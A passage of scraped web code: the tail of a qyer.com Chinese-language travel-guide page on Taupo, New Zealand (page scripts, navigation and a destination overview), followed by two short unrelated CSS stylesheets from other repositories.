popup.ajax('/api.php?action=impresscountry&oper=showform&countryid='+pid+'&showbatchdoings=1','440');
}
if(type=="poi"){
qyerUI.popup.ajax({url:'/api.php?action=addpoicomment&from=poi&source_type=11&poiid='+pid+'&typeid='+cityid+'&type=city', width:'690',isclose:'show'});
}
}else{
$(".pl_topbox_been_ed").removeClass().addClass("pl_topbox_been");
}
}else{
tips.show(rs.data.msg);
}
});
}
});
if(type!="poi"){
$("#doings_lived_button").click(function(){
if(uid==""){
ajaxlogin(undefined, undefined, undefined, "doings_callback");
}else{
doing['lived'+type](parseInt(1-parseInt(data.isdo.lived)),pid,function(rs){
//$("#doings_lived_button").unbind("click");
//showdoing(1);
if(rs.result=="ok"){
//alert(1);
data.isdo.lived = parseInt(1-parseInt(data.isdo.lived));
if(data.isdo.lived==1){
data.counts.livedcounts++;
}else{
data.counts.livedcounts--;
}
if(data.counts.livedcounts<0){data.counts.livedcounts=0;}
$("#doings_lived_counts").html(data.counts.livedcounts);
//showdoing(1);
if(data.isdo.lived=="1"){
//alert("a");
$(".pl_topbox_lived").removeClass().addClass("pl_topbox_lived_ed");
if(type!="continents"){
if(!isaddimpress && type=="city"){
popup.ajax('/api.php?action=impress&oper=showform&cityid='+pid,'440');
}
if(!isaddimpress && type=="country"){
popup.ajax('/api.php?action=impresscountry&oper=showform&countryid='+pid,'440');
}
}
}else{
$(".pl_topbox_lived_ed").removeClass().addClass("pl_topbox_lived");
}
}else{
tips.show(rs.data.msg);
}
});
}
});
}
//});
}
showdoing(0);
jQuery(function($){
//想去、去过、生活过
$(".pl_topbox_want").live("mouseover",function(){
$(this).addClass("pl_topbox_want_hav");
});
$(".pl_topbox_want").live("mouseout",function(){
$(this).removeClass("pl_topbox_want_hav");
});
$(".pl_topbox_been").live("mouseover",function(){
$(this).addClass("pl_topbox_been_hav");
});
$(".pl_topbox_been").live("mouseout",function(){
$(this).removeClass("pl_topbox_been_hav");
});
$(".pl_topbox_lived").live("mouseover",function(){
$(this).addClass("pl_topbox_lived_hav");
});
$(".pl_topbox_lived").live("mouseout",function(){
$(this).removeClass("pl_topbox_lived_hav");
});
$(".pl_topbox_want_ed").live("mouseover",function(){
$(this).addClass("pl_topbox_want_cls");
});
$(".pl_topbox_want_ed").live("mouseout",function(){
$(this).removeClass("pl_topbox_want_cls");
});
$(".pl_topbox_been_ed").live("mouseover",function(){
$(this).addClass("pl_topbox_been_cls");
});
$(".pl_topbox_been_ed").live("mouseout",function(){
$(this).removeClass("pl_topbox_been_cls");
});
$(".pl_topbox_lived_ed").live("mouseover",function(){
$(this).addClass("pl_topbox_lived_cls");
});
$(".pl_topbox_lived_ed").live("mouseout",function(){
$(this).removeClass("pl_topbox_lived_cls");
});
});
//alert(pid);
</script>
</div>
</div>
<div id="place_menu_hold" class="pla_menubar_hold">
<div id="place_memu_fix" class="pla_menubar" style="">
<div class="wrap clearfix">
<div class="pla_topnavs" id="pla_topnavs">
<ul class="nav fontYaHei" id="topnavfirst">
<li><a href="http://place.qyer.com/taupo/profile/" data-bn-ipg="place-city-nav-profile">城市指南</a></li>
<li><a href="http://place.qyer.com/new-zealand/nvisa/" data-bn-ipg="place-city-nav-nvisa">签证</a></li>
<li><a href="http://place.qyer.com/taupo/transportation/" data-bn-ipg="place-city-nav-transportation">交通</a></li>
</ul>
<ul class="nav fontYaHei">
<li><a href="http://place.qyer.com/taupo/sight/" data-bn-ipg="place-city-sight" >景点</a></li>
<li><a href="http://place.qyer.com/taupo/food/" data-bn-ipg="place-city-food" >美食</a></li>
<li><a href="http://place.qyer.com/taupo/shopping/" data-bn-ipg="place-city-shopping" >购物</a></li>
<li><a href="http://place.qyer.com/taupo/activity/" data-bn-ipg="place-city-activity" >活动</a></li>
<li><a href="http://place.qyer.com/taupo/hotel/" data-bn-ipg="place-city-hotel" >酒店</a></li>
</ul>
<ul class="nav fontYaHei">
<li><a href="http://plan.qyer.com/search.php?tags=%E9%99%B6%E6%B3%A2" data-bn-ipg="place-city-plan" target="_blank">行程计划</a></li>
<li><a href="http://place.qyer.com/taupo/travel-notes/" data-bn-ipg="place-city-travelnote" >热门游记</a></li>
</ul>
<div class="pla_topnavlay" id="topnavfirstlay" style="display:none;">
<p class="linemask" id="topnavfirstlay_mask"></p>
<ul class="navtab fontYaHei" id="topnavfirstlay_tab">
<li><a href="http://place.qyer.com/taupo/profile/" data-bn-ipg="place-city-nav-profile">城市指南</a></li>
<li><a href="http://place.qyer.com/new-zealand/nvisa/" data-bn-ipg="place-city-nav-nvisa">签证</a></li>
<li><a href="http://place.qyer.com/taupo/transportation/" data-bn-ipg="place-city-nav-transportation">交通</a></li>
</ul>
<ul class="navlist" id="topnavfirstlay_list">
<li>
<em class="tit"><a href="http://place.qyer.com/taupo/advice/" data-bn-ipg="place-city-旅行须知">旅行须知</a></em>
<p>
<a href="http://place.qyer.com/taupo/advice/#cate_126210">穷游er忠告</a>
<span>|</span> <a href="http://place.qyer.com/taupo/advice/#cate_126211">负责任的旅行</a>
<span>|</span> <a href="http://place.qyer.com/taupo/advice/#cate_126212">安全</a>
<span>|</span> <a href="http://place.qyer.com/taupo/advice/#cate_126215">中国驻该城市使领馆</a>
</p>
</li>
<li>
<em class="tit"><a href="http://place.qyer.com/taupo/profile/" data-bn-ipg="place-city-目的地概况">目的地概况</a></em>
<p>
<a href="http://place.qyer.com/taupo/profile/#cate_126217">目的地速写</a>
<span>|</span> <a href="http://place.qyer.com/taupo/profile/#cate_126218">当地人生活</a>
<span>|</span> <a href="http://place.qyer.com/taupo/profile/#cate_126222">环境</a>
<span>|</span> <a href="http://place.qyer.com/taupo/profile/#cate_126225">语言帮助</a>
</p>
</li>
<li>
<em class="tit"><a href="http://place.qyer.com/taupo/when-to-go/" data-bn-ipg="place-city-旅行季节">旅行季节</a></em>
<p>
<a href="http://place.qyer.com/taupo/when-to-go/#cate_126228">旅行季节</a>
</p>
</li>
<li>
<em class="tit"><a href="http://place.qyer.com/taupo/cost/" data-bn-ipg="place-city-货币与花费">货币与花费</a></em>
<p>
<a href="http://place.qyer.com/taupo/cost/#cate_126230">消费水平</a>
<span>|</span> <a href="http://place.qyer.com/taupo/cost/#cate_126231">货币兑换</a>
<span>|</span> <a href="http://place.qyer.com/taupo/cost/#cate_126232">银联</a>
<span>|</span> <a href="http://place.qyer.com/taupo/cost/#cate_126233">信用卡</a>
<span>|</span> <a href="http://place.qyer.com/taupo/cost/#cate_126234">小费</a>
<span>|</span> <a href="http://place.qyer.com/taupo/cost/#cate_126235">退税</a>
</p>
</li>
<li>
<em class="tit"><a href="http://place.qyer.com/taupo/information/" data-bn-ipg="place-city-实用信息">实用信息</a></em>
<p>
<a href="http://place.qyer.com/taupo/information/#cate_126240">网络</a>
<span>|</span> <a href="http://place.qyer.com/taupo/information/#cate_126242">邮局</a>
</p>
</li>
<li>
<em class="tit"><a href="http://place.qyer.com/taupo/transportation/" data-bn-ipg="place-city-城际交通">城际交通</a></em>
<p>
</p>
</li>
<li>
<em class="tit"><a href="http://place.qyer.com/taupo/citytransport/" data-bn-ipg="place-city-市内交通">市内交通</a></em>
<p>
</p>
</li>
</ul>
</div>
</div>
<div class="pla_topbtns">
<a href="javascript:void(0);" onclick="ask();" class="ui_button ask" data-bn-ipg="place-city-ask">提问</a>
<a href="javascript:void(0);" class="ui_button yelp" onclick="batchcomment(9162,'city');" data-bn-ipg="place-city-comment">写点评</a>
</div>
</div>
</div>
</div>
<script>
//头部place菜单置顶
$(function(){
var init = false;
var init_top = $("#place_menu_hold").offset().top;
var box = $("#place_memu_fix");
function menuScroll () {
var srl_top = $(window).scrollTop();
if(srl_top > init_top){
init = true;
box.css({"position":"fixed","top":"0","z-index":"99"});
}
else {
if(init) {
box.css({"position":"","top":"","z-index":""});
}
init = false;
}
}
$(window).scroll(function(){
menuScroll();
});
});
jQuery(function($){
//头部导航
var topnavs = $("#pla_topnavs");
var topnavfirst = $("#topnavfirst");
var topnavfirstlay = $("#topnavfirstlay");
var topnavfirstlay_cnts = $("#topnavfirstlay_tab,#topnavfirstlay_list,#topnavfirstlay_mask");
var topnavfirst_timer;
topnavfirst.mouseenter(function(){
//topnavs.css("z-index","99");
topnavfirstlay.fadeIn();
});
topnavfirstlay_cnts.hover(function(){
window.clearTimeout(topnavfirst_timer);
},function(){
topnavfirst_timer = window.setTimeout(function(){
//topnavs.css("z-index","");
topnavfirstlay.fadeOut();
},200);
});
});
function ask(){
if(!QYER.uid || QYER.uid=="" || QYER.uid==0){
ajaxlogin();
return;
}else{
popup.ajax('/api.php?action=ask_question&fid=0&from=2',760);
}
}
function beachdoings(){
qyerUI.popup.ajax({url:'/api.php?action=beachdoings&id=11',width:720});
}
function yelpcomment(id,typename,isaddimpress){
if(typeof id == 'undefined'){
id = 9162;
}
if(typeof typename == 'undefined'){
typename = 'city';
}
if(typeof isaddimpress == 'undefined'){
isaddimpress = '';
}
isaddimpress = parseInt(isaddimpress);
id = parseInt(id);
if(id == 0){
return;
}
if(!QYER.uid || QYER.uid=="" || QYER.uid==0){
ajaxlogin();
return;
}else{
if(typename=="country"){
url = '/api.php?action=impresscountry&countryid='+id+'&showbatchdoings=1';
}else if (typename=="city"){
url = '/api.php?action=impress&cityid='+id+'&showbatchdoings=1';
}
if (isaddimpress>0){
url = url + '&oper=editform';
}else{
url = url + '&oper=showform';
}
popup.ajax(url,'440');
}
}
function batchcomment(id,type){
if(!QYER.uid || QYER.uid=="" || QYER.uid==0){
ajaxlogin();
return;
}
if(typeof id == 'undefined'){
id = 9162;
}
if(typeof type == 'undefined'){
type = "city";
}
$(window).scrollTop(0);
var height = $(window).height() - 61;
var node = document.getElementById("fullpup_footprint");
if(!node){
var para = document.createElement("div");
para.id = "fullpup_footprint";
document.body.appendChild(para);
//console.log(para);
}
qyerUI.popup.ajax({url:'/api.php?action=placeleadpoi&oper=showform&source_type=15&id='+id+'&type='+type, width:'720',isclose:'show'});
}
function fullTrackClose(){
var href = window.location;
href = String(href);
if(href.indexOf("http://place.qyer.com")>=0)
{
var ref = document.referrer;
var baiduurl = "http://qt.qyer.com/beacon.gif?type=click&category=comlayer-close1-city-"+9162+"&campaign=inpage&referer="+ encodeURIComponent(window.location.href) +"&referer_link="+ ref +"&guid="+ jQuery.cookie("_guid") +"&user_id=&session="+ jQuery.cookie("_session");
jQuery.get(baiduurl, function(data){});
$("#fullpup_footprint").fadeOut(300);
$("html,body").css("overflow","");
}else{
location.reload();
}
}
</script>
<div class="pla_wrap mb60">
<div class="pla_side2">
<ul class="pla_listpage_nav mb60">
<li class="item">
<div class="box">
<p class="tit"><a href="http://place.qyer.com/taupo/advice/" >旅行须知</a></p>
<ul class="subnav">
<li><a href="http://place.qyer.com/taupo/advice/#cate_126210" >穷游er忠告</a></li>
<li><a href="http://place.qyer.com/taupo/advice/#cate_126211" >负责任的旅行</a></li>
<li><a href="http://place.qyer.com/taupo/advice/#cate_126212" >安全</a></li>
<li><a href="http://place.qyer.com/taupo/advice/#cate_126215" >中国驻该城市使领馆</a></li>
</ul>
</div>
</li>
<li class="item current">
<div class="box">
<p class="tit"><a href="http://place.qyer.com/taupo/profile/" >目的地概况</a></p>
<ul class="subnav">
<li><a href="http://place.qyer.com/taupo/profile/#cate_126217" >目的地速写</a></li>
<li><a href="http://place.qyer.com/taupo/profile/#cate_126218" >当地人生活</a></li>
<li><a href="http://place.qyer.com/taupo/profile/#cate_126222" >环境</a></li>
<li><a href="http://place.qyer.com/taupo/profile/#cate_126225" >语言帮助</a></li>
</ul>
</div>
</li>
<li class="item">
<div class="box">
<p class="tit"><a href="http://place.qyer.com/taupo/when-to-go/" >旅行季节</a></p>
<ul class="subnav">
</ul>
</div>
</li>
<li class="item">
<div class="box">
<p class="tit"><a href="http://place.qyer.com/taupo/cost/" >货币与花费</a></p>
<ul class="subnav">
<li><a href="http://place.qyer.com/taupo/cost/#cate_126230" >消费水平</a></li>
<li><a href="http://place.qyer.com/taupo/cost/#cate_126231" >货币兑换</a></li>
<li><a href="http://place.qyer.com/taupo/cost/#cate_126232" >银联</a></li>
<li><a href="http://place.qyer.com/taupo/cost/#cate_126233" >信用卡</a></li>
<li><a href="http://place.qyer.com/taupo/cost/#cate_126234" >小费</a></li>
<li><a href="http://place.qyer.com/taupo/cost/#cate_126235" >退税</a></li>
</ul>
</div>
</li>
<li class="item">
<div class="box">
<p class="tit"><a href="http://place.qyer.com/taupo/information/" >实用信息</a></p>
<ul class="subnav">
<li><a href="http://place.qyer.com/taupo/information/#cate_126240" >网络</a></li>
<li><a href="http://place.qyer.com/taupo/information/#cate_126242" >邮局</a></li>
</ul>
</div>
</li>
<li class="item">
<div class="box">
<p class="tit"><a href="http://place.qyer.com/taupo/transportation/" >城际交通</a></p>
<ul class="subnav">
</ul>
</div>
</li>
<li class="item">
<div class="box">
<p class="tit"><a href="http://place.qyer.com/taupo/citytransport/" >市内交通</a></p>
<ul class="subnav">
</ul>
</div>
</li>
</ul>
<div>
<div class="pla_titles">
<h2 class="pla_title fontYaHei">陶波穷游锦囊</h2>
<p class="pla_titmore"><a href="http://guide.qyer.com" target="_blank">更多</a></p>
</div>
<ul class="pla_listpage_sidegd2">
<li>
<p class="pic"><a href="http://guide.qyer.com/driving-in-nz/" target="_blank"><img width="100" height="150" alt="" src="http://static.qyer.com/upload/Guide_Info/73/27/113/100_150.jpg?1386842899"></a></p>
<h3 class="title"><a href="http://guide.qyer.com/driving-in-nz/" title="新西兰自驾" target="_blank">新西兰自驾</a></h3>
<p class="info">更新于2013-12-12<br>
作者:<a href="http://www.qyer.com/u/1168090" target="_blank">ethanwyq</a>
</p>
<p class="text">新西兰作为这个世界上最早迎接新一天的国家之一,作为世界上最宜...</p>
<p class="down"><a href="javascript:;" class="ui_buttonA _jsjndown" data-id="113" data-bn-ipg="place-city-side-down1">免费下载</a></p>
</li>
</ul>
</div>
<script language="javascript">
new JnCommon({source: 'one'})
</script>
</div>
<div class="pla_main2">
<div class="pla_pagetits">
<h2 class="pla_bigtit fontYaHei">陶波目的地概况</h2>
<a href="javascript::void(0);" onclick="return entrycheckuser();" ><input class="ui_btn_small_cancel" type="button" style="margin: 1px 0 0 10px;" value="编辑指南"/></a>
</div>
<div>
<div class="pla_titles">
<p style="position:absolute; top:-50px;" id="cate_126217" name="cate_126217"></p>
<h2 class="pla_ztitle fontYaHei">目的地速写</h2>
</div>
<div class="pla_txtquote">
<p>陶波在奥克兰以南278公里,行程约4小时。位于新西兰最大湖陶波湖的东北角。陶波景色壮丽,附近旅游景点众多,这使得它成为人气旺盛的休闲胜地。陶波郊外附近,湍急的河水奔流不息,更有以胡卡瀑布为首的众多生气勃勃的景观,吸引着众多的游客。游客在这里可以洗温泉、钓鳟鱼、赏胡卡瀑布奇景、进行蹦极。很多高级度假山庄都设在陶波。此外,冬季在乘车约1公里外的法卡帕帕滑雪场,可以享受滑雪活动。总之,陶波市周边的各类活动丰富多彩,作为全年的休养地而备受欢迎。</p>
<div> </div>
<div class="mt5">
电源插座:
I <img src="http://static.qyer.com/images/place/power/I.gif" width="48" height="48" alt="电源插座I型" />
电压:
230V
240V
频率:
50HZ
</div>
</div>
</div>
<div class="pla_sldline1"></div>
<div>
<div class="pla_titles">
<p style="position:absolute; top:-50px;" id="cate_126218" name="cate_126218"></p>
<h2 class="pla_ztitle fontYaHei">当地人生活</h2>
</div>
<div class="pla_txtquote">
<p>新西兰一直被誉为“上帝留给自己养老的地方”,的确,这也是一个养老的好地方。新西兰南岛的环境纯净天然,这里的人们过着悠闲缓慢的生活,对于他们来说,赚钱并不是工作的唯一意义。每天傍晚五六点钟商店会准时关门谢客,周日营业时间更少之又少,与国内每到周末商场人满为患的景象形成鲜明的对比。新西兰融合了当地毛利土著、欧洲、太平洋岛屿以及亚洲的历史与文化,俨然成为世界多个民族人民的大熔炉——但其中也不乏共有特征,这使得这座岛国成为了世界上独一无二的国度。</p>
<p>新西兰人特别热爱大自然,节假日一家人开着房车或者露营车到山里享受自然,是大多数新西兰家庭喜欢做的事情;或者开上自家游艇去海里垂钓,生活甚是惬意。因此新西兰人对自然资源的保护投入很大,他们不喜欢把国家公园作为景点圈出来,所以所有的国家公园都是开放式的,也没有任何所谓的门票。但有些景观处会设有捐款(Donation)的盒子,如果你愿意可以做些支持。</p>
<p>在新西兰南岛,你很难找到一幢超过六层楼的房子,人们住House(房子)多过Apartment(公寓),而每家每户几乎都有一个精心料理的花园,一年四季充满不同颜色。在这里,工人、农民和医生教授拥有同等地位,没有人会因为工作小看你。学历似乎也并不那么重要,享受生活才是生命的意义。新西兰人工很贵,所以大部分女主人都会烘焙烹饪打点园艺,男主人也会修理汽车、家电、修剪草坪,如果在新西兰南岛半路出现问题(比如自驾车发动不了)可以找附近人家帮忙,到当地人家做客可以带一份自己做的糕点或者手工作品。</p>
<p>既然新西兰,尤其新西兰南岛,风光秀丽,景色优美,生活又轻松自在,当地人岂不是没有烦恼?那可不一定,这个小小的岛屿之国隐藏在地球南部的小角落,作为世界上最迟开发的土地,她也蒙受着不轻不重的孤立感(Isolated),就像幼儿园里常常一个人玩耍的小朋友,同桌澳大利亚和前后桌美国、中国搭讪聊天偶尔忘了她的存在。所以在新西兰南岛旅行时,你也可以常常看到一些旅馆里的世界地图略带讽刺地倒置着挂,这时处于世界地图中心顶端地新西兰终于呐喊了一声。</p>
<p>总的来说,新西兰南岛的人民还是相当友善,也总能自娱自乐。所以面带微笑地去享受蓝天白云绿草地吧,当人们经过你身旁向你问好时,别忘了笑着回应,那将在你的南岛之旅中留下一片温暖的阳光。可以毫不夸张地说,结识大方而友好的新西兰人将成为你旅行中最值得珍惜留恋的记忆。在旅行途中与当地人交流——在酒吧、餐厅或当地市场与人闲聊几句——这或许是深入了解当地风土人情的最佳方式,你甚至还有机会学习几句新西兰的方言,建立起终生难忘的友谊!</p>
</div>
</div>
<div class="pla_sldline1"></div>
<div>
<div class="pla_titles">
<p style="position:absolute; top:-50px;" id="cate_126222" name="cate_126222"></p>
<h2 class="pla_ztitle fontYaHei">环境</h2>
</div>
<div class="pla_txtquote">
<p>新西兰除了冬季情况较特殊以外,长年适合自驾旅行,且景色千差万变。春冬季,更可以看到山顶白雪覆盖,溪川流淌。夏秋季,满目金黄,夜晚繁星闪烁。</p>
<p>由于新西兰360度环海,因此这里的气候是标准的海洋性气候。与北半球相反,这里的夏季是从12月到3月,这时候万物生机,温暖 舒适;即使在冬天,这里也并不会冷得让大家不想出门。对于游客 来说,从圣诞节到2月份是新西兰游的绝对旺季,在这个时候前往新 西兰,住宿费用会比平时高出不少。因此,如果想避开高峰又想不 错过夏天的美的话,最好的出游时间便是10月、11月和隔年的3 月、4月。5月到9月便是这里的冬季,也是一年中最潮湿阴冷的时候,不过这时也是新西兰的滑雪季了,你可以在整个新西兰感受到世界级雪场的快乐,同时,白雪覆盖的南半球阿尔卑斯(South Alps)等山峦会绽放出与夏天不同的美丽。</p>
<p>请大家根据季节适当备好衣物,同时注意,即使是在 夏天,如果是要登山或清晨徒步的话,请务必带好长袖厚上衣,当地温差浮动较大。</p>
</div>
</div>
<div class="pla_sldline1"></div>
<div>
<div class="pla_titles">
<p style="position:absolute; top:-50px;" id="cate_126225" name="cate_126225"></p>
<h2 class="pla_ztitle fontYaHei">语言帮助</h2>
</div>
<div class="pla_txtquote">
<p>新西兰有典型的kiwi English,在发音上有一些不同,在e的发音上,如bed,他们会发bid的音;而i的发音,如bin,他们会发ben的音,因此需要仔细辨别;但整体上来讲,友好的新西兰人见到非英语国家的人英文讲的也会慢很多,便于我们的理解。</p>
</div>
</div>
<p class="pla_sldline1"></p>
<p class="pla_gdpage_uptime">更新时间:2013-03-01<span><a href="http://place.qyer.com/taupo/profile/edit/" >添加 / 更新</a></span></p>
</div>
<div class="cb"></div>
</div>
<script>
function entrycheckuseraaa(uid){
alert(uid);
/*
if(uid==null){
if (ajaxlogin() == false) {
ckform();
return false;
}
}else{
alert("http://place.qyer.com/taupo/profile/");
//loaction.href="http://place.qyer.com/taupo/profile/";
return false;
}*/
}
$(function(){
//左侧导航
var poilisttab = $("#poilisttab");
var poilists = $("#poilists");
var poilists_ul = poilists.find("ul");
var poilisttab_bg = poilisttab.find(".bg");
var poilisttab_index = 0;
var poilisttab_bg_left = -24;
poilisttab.find("li").each(function(index, element) {
$(this).mouseenter(function(){
var left = 89 * index + poilisttab_bg_left;
poilisttab_bg.css("left",left);
poilists_ul.hide().eq(index).show();
});
});
//列表结果筛选
var result_sifthandle = $("#result_sifthandle");
var result_siftoption = $("#result_siftoption");
result_sifthandle.toggle(function(){
result_siftoption.slideDown();
},function(){
result_siftoption.slideUp();
});
});
</script><script language="javascript" src="http://static.qyer.com/min/?version=1409305643&b=js&f=place/global.js" /></script>
<div class="phpreferer" style="display: none;"></div>
<script language="javascript">
spam_text_filter();
</script>
<div class="qyer_footer">
<div class="qyer_footerBox">
<ul class="qyer_footer_about">
<li>
<dl>
<dt>关于我们</dt>
<dd><a href="http://www.qyer.com/htmlpages/about.html" target="_blank" rel="nofollow" data-bn-ipg="foot-about-1">穷游简介</a></dd>
<dd><a href="http://www.qyer.com/htmlpages/contact.html" target="_blank" rel="nofollow" data-bn-ipg="foot-about-2">联系我们</a></dd>
<dd><a href="http://www.qyer.com/partner/" target="_blank" rel="nofollow" data-bn-ipg="foot-about-3">合作伙伴</a></dd>
</dl>
</li>
<li>
<dl>
<dt>加入穷游</dt>
<dd><a href="http://www.qyer.com/job/" target="_blank" rel="nofollow" data-bn-ipg="foot-join-1">招聘职位</a></dd>
</dl>
</li>
<li>
<dl>
<dt>网站条款</dt>
<dd><a href="http://www.qyer.com/htmlpages/member.html" target="_blank" rel="nofollow" data-bn-ipg="foot-clause-1">会员条款</a></dd>
<dd><a href="http://www.qyer.com/htmlpages/bbsguide.html" target="_blank" rel="nofollow" data-bn-ipg="foot-clause-2">社区指南</a></dd>
<dd><a href="http://www.qyer.com/htmlpages/copyright.html" target="_blank" rel="nofollow" data-bn-ipg="foot-clause-3">版权声明</a></dd>
<dd><a href="http://www.qyer.com/htmlpages/exemption.html" target="_blank" rel="nofollow" data-bn-ipg="foot-clause-4">免责声明</a></dd>
</dl>
</li>
<li>
<dl>
<dt>帮助中心</dt>
<dd><a href="http://site.qyer.com/tyro/" target="_blank" rel="nofollow" data-bn-ipg="foot-help-1">新手上路</a></dd>
<dd><a href="http://bbs.qyer.com/faq.php" target="_blank" rel="nofollow" data-bn-ipg="foot-help-2">使用帮助</a></dd>
<dd><a href="http://www.qyer.com/sitemap.html" target="_blank" data-bn-ipg="foot-help-4">网站地图</a></dd>
</dl>
</li>
<li>
<dl>
<dt>关注我们</dt>
<dd class="qyer_footer_attention"><img src="//static.qyer.com/images/common/icon_attention.png" alt="" width="80" height="50" border="0" usemap="#Map_go2att" />
<map name="Map_go2att" id="Map_go2att">
<area shape="rect" coords="0,0,20,20" href="http://t.sina.com.cn/go2eu" target="_blank" rel="nofollow" alt="穷游网@新浪微博" title="穷游网@新浪微博" onclick="_gaq.push(['_trackEvent','outlink','buttomlink','weibo',1]);" data-bn-ipg="foot-concern-1" />
<area shape="rect" coords="30,0,50,20" href="http://www.flickr.com/photos/go2eu" target="_blank" rel="nofollow" alt="穷游网@flickr" title="穷游网@flickr" onclick="_gaq.push(['_trackEvent','outlink','buttomlink','flickr',1]);" data-bn-ipg="foot-concern-2" />
<area shape="rect" coords="60,0,80,20" href="http://page.renren.com/600986584" target="_blank" rel="nofollow" alt="穷游网@人人" title="穷游网@人人" onclick="_gaq.push(['_trackEvent','outlink','buttomlink','renren',1]);" data-bn-ipg="foot-concern-3" />
<area shape="rect" coords="0,30,20,50" href="http://site.douban.com/go2eu" target="_blank" rel="nofollow" alt="穷游网@豆瓣" title="穷游网@豆瓣" onclick="_gaq.push(['_trackEvent','outlink','buttomlink','douban',1]);" data-bn-ipg="foot-concern-4" />
<area shape="rect" coords="30,30,50,50" href="http://www.facebook.com/#!/qiongyou" target="_blank" rel="nofollow" alt="穷游网@facebook" title="穷游网@facebook" onclick="_gaq.push(['_trackEvent','outlink','buttomlink','facebook',1]);" data-bn-ipg="foot-concern-5" />
<area shape="rect" coords="60,30,82,50" href="http://twitter.com/go2eucom" target="_blank" rel="nofollow" alt="穷游网@twitter" title="穷游网@twitter" onclick="_gaq.push(['_trackEvent','outlink','buttomlink','twitter',1]);" data-bn-ipg="foot-concern-6" />
</map>
</dd>
</dl>
</li>
</ul>
<div class="qyer_footer_appStore"><a href="http://itunes.apple.com/cn/artist/qyer/id492202235" target="_blank" rel="nofollow" data-bn-ipg="foot-appstore"><img src="//static.qyer.com/images/common/appstore.png" width="118" height="39" alt="穷游网@App Store" title="穷游网@App Store" /></a></div>
<div class="qyer_footer_copyright"><a href="http://www.qyer.com/" rel="nofollow" data-bn-ipg="foot-logo"><img src="//static.qyer.com/images/common/foot_logo.png" width="100" height="30" alt="穷游网" /></a>
<p>2004-2014 © 穷游网™ qyer.com All rights reserved. <a href="http://www.miibeian.gov.cn/" target="_blank" rel="nofollow">京ICP备12003524号</a> 京公网安备11010502023470</p>
<p><a href="http://www.qyer.com/">穷游网</a>为<a href="http://www.qyer.com/">旅行</a>者提供原创实用的<a href="http://www.qyer.com/">出境游</a><a href="http://place.qyer.com/">旅行指南</a>和<a href="http://place.qyer.com/">旅游攻略</a>、<a href="http://bbs.qyer.com/">旅行社区</a>和<a href="http://ask.qyer.com/">问答</a>交流平台,并提供<a href="http://qyer.ailvxing.com/">签证</a>、<a href="http://bx.qyer.com/">保险</a>、<a href="http://flight.qyer.com/">机票</a>、<a href="http://hotel.qyer.com/">酒店预订</a>、<a href="http://car.qyer.com/">租车</a>等服务。</p>
</div>
<!--友情链接模块-->
</div>
</div>
<script type="text/javascript">
if(typeof timewait == "undefined" || timewait===false){
setTimeout('loadjscssfile("//static.qyer.com/js/common/beforelogin.js","js")',1000);
}
</script>
<script src="//static.qyer.com/js/common/feedback.js" type="text/javascript"></script>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-185023-1']);
_gaq.push(['_setDomainName', 'qyer.com']);
_gaq.push(['_setSiteSpeedSampleRate',10]);
_gaq.push(['_addIgnoredRef', 'qyer.com']);
_gaq.push(['_addOrganic','soso','w']);
_gaq.push(['_addOrganic','sogou','query']);
_gaq.push(['_addOrganic','baidu','word']);
_gaq.push(['_addOrganic','baidu','q1']);
_gaq.push(['_addOrganic','baidu','q2']);
_gaq.push(['_addOrganic','m.baidu','word']);
_gaq.push(['_addOrganic','so.360','q']);
_gaq.push(['_addOrganic','so','q']);
_gaq.push(['_addOrganic','baidu','w']);
_gaq.push(['_addOrganic','cn.bing','q']);
_gaq.push(['_addOrganic','sm','q']);
_gaq.push(['_trackPageview']);
var _qyer_userid = "";
(function() {
var qt = document.createElement('script'); qt.type = 'text/javascript'; qt.async = true;
qt.src = 'http://qt.qyer.com/beacon.js';
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
if('https:' == document.location.protocol){
var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ga, s);
}else{
var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(qt, s); s.parentNode.insertBefore(ga, s);
}
})();
</script>
<script src="//static.qyer.com/js/plan/planner-clipboard.js?v1"></script>
</body>
</html>
|
S_DW_Continuous_Deployment_test/Admin/Module/eCom_Catalog/dw7/controls/FieldOptionsList/FieldOptionsList.css | Saftemand/S_DW_Continuous_Deployment_Test | .option-field-offset
{
margin-left: 10px;
}
.hidden-message
{
display: none;
}
tr.footer span
{
margin-left: 2px;
}
div.grid-container
{
border: 1px solid #6593cf;
width: 650px;
}
div.sorting-hint
{
margin-top: 10px;
margin-left: 2px;
color: #8c8c8c;
padding-left: 20px;
height: 16px;
background: url('/Admin/Images/Ribbon/Icons/Small/information.png') top left no-repeat;
} |
build/css/structure.css | emiolo-com/Estrutura-front-end |
/* line 12 : c:\xampp\htdocs\addcon.com.br\app\stylus\structure.styl */
/* line 1 : c:\xampp\htdocs\addcon.com.br\node_modules\stylus\lib\functions\index.styl */
/* line 1 : c:\xampp\htdocs\addcon.com.br\app\stylus\structure.styl */
body{font:12px Helvetica,Arial,sans-serif}
/* line 4 : c:\xampp\htdocs\addcon.com.br\app\stylus\structure.styl */
a:link,a:visited{-webkit-border-radius:5px;-moz-border-radius:5px;border-radius:5px;color:#f00;border:1px solid #ccc;padding:5px;text-tranform:uppercase;background-color:#ccc}
